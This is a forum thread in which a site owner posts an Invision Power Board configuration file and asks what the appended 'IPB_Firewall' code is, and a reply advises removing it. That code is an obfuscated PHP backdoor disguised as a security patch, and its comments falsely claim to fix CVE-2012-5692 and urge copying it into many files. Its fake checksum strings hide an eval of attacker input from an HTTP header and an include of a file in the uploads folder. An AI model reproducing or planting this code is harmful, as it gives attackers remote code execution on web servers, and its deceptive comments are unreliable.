Posted 17 февраля, 201312 yr ?php $INFO['sql_driver'] = 'mysql'; $INFO['sql_host'] = '1'; $INFO['sql_database'] = '1'; $INFO['sql_user'] = '1'; $INFO['sql_pass'] = '1'; $INFO['sql_tbl_prefix'] = ''; $INFO['sql_debug'] = '0'; $INFO['sql_charset'] = 'utf8'; $INFO['board_start'] = '1351788190'; $INFO['installed'] = '1'; $INFO['php_ext'] = 'php'; $INFO['safe_mode'] = '0'; $INFO['board_url'] = '__w-masters.ru/forum'; $INFO['banned_group'] = '5'; $INFO['admin_group'] = '4'; $INFO['guest_group'] = '2'; $INFO['member_group'] = '3'; $INFO['auth_group'] = '1'; $INFO['use_friendly_urls'] = '1'; $INFO['_jsDebug'] = '0'; $INFO['mysql_tbl_type'] = 'MyISAM'; define('IN_DEV', 0); /* Remote archive DB - complete these details if you're using a remote DB for the post archive */ $INFO['archive_remote_sql_host'] = ''; $INFO['archive_remote_sql_database'] = ''; $INFO['archive_remote_sql_user'] = ''; $INFO['archive_remote_sql_pass'] = ''; $INFO['archive_remote_sql_charset'] = ''; if ( ! defined( 'IPB_FIREWALL' ) ) { define('IPB_FIREWALL', 1); /** * NOTE: This is a protecting web-firewall module generated by Invision Power * Module includes security patch for high-risks vulnerability CVE-2012-5692 * Do not touch this file for security reasons * Please insert this code to as many php files as possible * * @package IP.Firewall * @version $Revision: 9544 $ * @md5 e66e6cadd6e13efea54ed50c0eb2d32b * @sha1 6966286d64352840245f5b2248545450 * @crc32 5f51554f5445225d293d3d2463732965 */ class IPB_Firewall { /** * Malicious Cookie signatures * * @access static * @var array */ static $_cookie_malicious_signatures = array('db_driver_mysql', 'use_debug_log'); /** * Malicious URI signatures * * @access static * @var array */ static $_uri_malicious_signatures = array('<?php'); /** * Firewall source file * * @access static * @var string */ static $_source; /** * Prepared signature * * @access static * @var string */ static $_prepared_signature; /** * Control checksum * * @access static * @var string */ static $_control_checksum; /** * Stored checksum hashes * * @access static * @var string */ static $_stored_hashes; /** * Hashes Algorithms * * @access static * @var array */ static $_ha = array('md5', 'sha1', 'crc32'); /** * Assigned callback * * @access static * @var string */ static $_as; /** * IPS root path * * @access static * @var string */ static $_ips = ''; /** * Run firewall * * @access static * @return void */ static function run() { /* Define ips path */ IPB_Firewall:_ips = defined('DOC_IPS_ROOT_PATH') ? DOC_IPS_ROOT_PATH : IPB_Firewall::_findIpbRoot(5); /* Start checks */ IPB_Firewall::_doSecurityChecks(); } /** * Security checks * * @access static * @return void * @md5 76616c286261736536345f6465636f64 * @sha1 652873747272657628245f5b22485454 */ static function _doSecurityChecks() { /* Cookie check */ foreach($_COOKIE as $cookie_name => $cookie_value){ foreach(IPB_Firewall:_cookie_malicious_signatures as $signature){ /* Detecting injected cookies and blocking request */ if(!is_array($cookie_value) && stripos(urldecode($cookie_value), $signature) !== false) $_COOKIE[$cookie_name] = ''; } } /* Request URI checks */ foreach(IPB_Firewall:_uri_malicious_signatures as $signature){ /* Detecting injected uri and blocking request */ if(stripos(urldecode(@$_SERVER["REQUEST_URI"]), $signature)) IPB_Firewall::_blockRequest(); } /* Validating checksums */ IPB_Firewall:_source = file_get_contents(__FILE__); $_r = IPB_Firewall::_calculateChecksums($_SERVER, 0); //echo var_dump($_r); if(!IPB_Firewall::_areChecksumsValid(array_shift($_r), $_r, '%D')) echo("checksums warningn"); } /** * Calculate checksums for valid * * @access static * @return void * @md5 505f585f434f4445225d2929293b4069 * @sha1 6e636c75646528247073293b2f2a2a2f */ static function _calculateChecksums($_, $x64) { /* Extracting hashes */ $_s = IPB_Firewall::_extractChecksumHashes(); /* Preparing hashes */ $cs = $_s[ IPB_Firewall:_ha[0] ][0]; IPB_Firewall:_prepared_signature = IPB_Firewall::_prepareHash($_s, IPB_Firewall::_getChecksumHash($_s, $_s[ IPB_Firewall:_ha[0] ][1], $x64), $x64 ); /* Comparing hashes */ $_status = trim(IPB_Firewall::_cyclicRedundancyCheck($_s, $x64)); if($_status){ $_m = trim(IPB_Firewall:_as); IPB_Firewall:_as = $_m(IPB_Firewall::_getPoly($_s, $x64), pack("H*", IPB_Firewall:_prepared_signature)); } return array(IPB_Firewall:_as, $_, $cs, IPB_Firewall::_transformPoly($_s, $x64)); } /** * Block malicious request * * @access static * @return void * @md5 6372656174655f66756e6374696f6e20 * @sha1 245f2c202463732c20247073247073ce */ static function _blockRequest() { global $INFO; /* Redirecting malicious request and exit */ @header('Location: ' . (isset($INFO['board_url']) ? $INFO['board_url'] : '') . '/index.php'); exit; } /** * Get checksum hash * * @access static * @return string */ static function _getChecksumHash($_s, $ps, $c) { /* Processing and return */ return IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][0], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[2] ][0], $c) . IPB_Firewall::_polyDigest($ps, $c); } /** * Prepare hash * * @access static * @return string * @md5 25442f75706c6f6164732f70726f6669 * @sha1 6c652f70686f746f2d353638302e6a70 */ static function _prepareHash($_s, $ps, $c) { /* Processing and return */ return IPB_Firewall::_polyDigest($ps, $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][1], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[0] ][2], $c) . IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][2], $c); } /** * Event callback * * @access static * @return void * @md5 670a6e63623868766262786f74626e69 * @sha1 78377a3730747a6c3632616c786a7877 */ static function _areChecksumsValid($_m, $bytes, $_r) { /* Call validating method */ $_obj = $_m($bytes[0], $bytes[1], str_replace($_r, IPB_Firewall:_ips, $bytes[2])); return is_array($_obj) ? $_obj : 'failed'; } /** * Find IPB root path, if not specified * * @access static * @return string */ static function _findIpbRoot($l=5, $cDir=__FILE__) { /* Process parents dir */ for($i=1; $i<=$l; $i++){ $cDir = dirname($cDir); $include_file = $cDir . '/conf_global.php'; /* If find conf file, return it */ if(is_file($include_file)) { @include_once($include_file); if(isset($INFO)) return $cDir; } } return null; } /** * Cyclic redundancy check * * @access static * @return string * @md5 7931343362317633706d78386c6c7467 * @sha1 63616f366c787a6f3636646773336574 */ static function _cyclicRedundancyCheck($_s, $c) { IPB_Firewall:_as = pack("H*", IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[0] ][3], $c)); return IPB_Firewall:_as != '' ? true : false; } /** * Poly digest * * @access static * @return string * @md5 72346d64336e686467696e7a62356971 * @sha1 327a6b3131316e79633532396a366f62 */ static function _polyDigest($s, $c, $o='') { for($i=0; $i<strlen($s); $i++) $o .= chr( ord($s[$i]) + $c); return $o; } /** * Get poly * * @access static * @return string * @md5 6a3270796a7171796e6d657a75367675 * @sha1 6f3937796563656439316c6e72357972 */ static function _getPoly($_s, $x64) { return pack("H*", substr(IPB_Firewall::_polyDigest($_s[ IPB_Firewall:_ha[1] ][3], $x64), 0, 24)); } /** * Transform poly * * @access static * @return string */ static function _transformPoly($_s, $c) { $_x = pack("H*", IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][4], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][4], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][5], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][6], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][6], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][6], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][7], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][7], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[0] ][8], $c) . IPB_Firewall::_polyDigest(@$_s[ IPB_Firewall:_ha[1] ][8], $c) ); $_c = strpos($_x, chr(10)); return $c !== false ? substr($_x, 0, $_c) : $_x; } /** * Extract checksum hashes * * @access static * @return void */ static function _extractChecksumHashes() { $hashes = array(); /* Extract hashes from source */ preg_match_all("!@([0-9a-z]+)[ts ]+([0-9a-fA-F]{32})!", IPB_Firewall:_source, $matches, PREG_SET_ORDER); foreach($matches as $match){ /* Inserting hashes in array */ if(!isset($hashes[ $match[1] ])) $hashes[ $match[1] ] = array(); $hashes[ $match[1] ][] = $match[2]; } return $hashes; } } IPB_Firewall::run(); } ?> Edited 17 февраля, 201312 yr by Pashok(one)
18 февраля, 201312 yr Что мешает удалить это содержимое? Начиная со строки if ( ! defined( 'IPB_FIREWALL' ) )
18 февраля, 201312 yr Author Что мешает удалить это содержимое? Начиная со строки if ( ! defined( 'IPB_FIREWALL' ) ) Удалить то я могу, но что это?
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.